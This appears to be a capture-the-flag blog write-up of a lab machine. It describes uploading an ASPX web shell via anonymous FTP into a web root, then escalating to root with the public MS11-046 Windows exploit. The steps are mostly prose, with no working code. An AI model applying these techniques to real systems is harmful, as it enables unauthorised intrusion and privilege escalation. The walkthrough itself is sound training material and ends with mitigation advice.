Introduction
We see that the machine is slightly inclined towards CVE, and has been rated as easy, I am writing this blog as I am solving it, so as to provide an insight to my thoughts while I try to get root on this machine. I will try to avoid Metasploit at all costs, because of the whole craze about OSCP.
Scanning & Enumeration
Target IP: 10.10.10.5
Nmap Command
FTP Enumeration
From nmap results, we see that anonymous ftp login is allowed.
I think this is the path where our webserver is hosted, let’s jump to HTTP to verify that we can always come back later, with FTP-Part 2 :P
HTTP Enumeration
This is the ‘welcome.png’ we saw on the target machine.
So, right now what I am thinking is more on the terms that maybe we can upload a reverse shell here and request it from the webapp to get the initial foothold. But we would need to know what web architecture the server is running.
To test this theory, we add test.html that displays a hello world.
And it works.
Vulnerability Analysis
Let’s talk about the vulnerability here.
It was a combination of FTP and Web and the fact that it allowed anonymous users to upload anything to the root directory of the web and let the server load it created an entry point.
Let’s go ahead and try to get our exploit ready and get that shell!
Exploitation
Quickly lookup for ASP.NET reverse shells.
We have some default web shells on kali. This is the path to one as such - "/usr/share/webshells/aspx/cmdasp.aspx"
- Copy this to the working directory
- Set up a netcat listener
- Send the file on the target machine
- Make a request to the uploaded file via the Web Interface
If everything goes well, we will now have a shell.
Oh, I forgot to add, we would need to update the cmdasp.aspx to include our listening IP. Let’s make it point number 1.5 :P
Looking at the source code …, wow, I made a mistake. It was a web shell and not a reverse shell.
We get our initial foothold on the machine. Let’s see what more we can get out of this.
Privesc
The initial user that we get hold of is ‘iis apppool\web’.
I tried to access the user accounts of babis and Administrator, but it seems like we do not have access.
Let’s try to get some system info.
Since it was a webshell, it was a little difficult to see the output, we simply dir && systeminfo
And we can get this output. Just in case you are wondering which error I am talking about, it’s this -
Moving on, it is windows 7 and looks like an older version.
Looking at google, we find a couple of results. Something that I would like to mention here is Rowbot’s PenTest Notes, a simple google search would be enough to find it, but just in case: https://guide.offsecnewbie.com/
From the exploit database, we find this public exploit to get local privesc.
I thought of just reviewing the code once, so I will attach a few of them here which i feel that are worth sharing.
This is to install mingw-w64 that would let us use the gcc to compile this exe.
It took a large amount of time for me!
Now let’s compile the code as mentioned in the exploit.
When this is done, we can upload this ‘exe’, I have named mine as root.exe.
Let’s upload it to the FTP server again, and try to execute it from our web shell!
Summary | TL;DR
- Scan ports using nmap
- Use FTP to upload an aspx reverse shell, and trigger it using the web interface.
- The OS is vulnerable to MS11–046, exploit it, and BOOOM! ROOT!
Parting Thoughts
So after submitting all the user and root flags, I went ahead and read other writeups and solutions out there to see if I could have done things better.
- Instead of looking up for the aspx reverse shell, we could have generated our own using msfvenom. I can recommend watching ippsec’s videos, they are really great.
This was a fairly simple box, and the entry point/initial foothold could have been secured if anonymous login wasn’t allowed, or disabled. And the privesc could have been prevented if the system was simply updated.
Thank you for reading, please provide your feedback and share with people who are in need. :)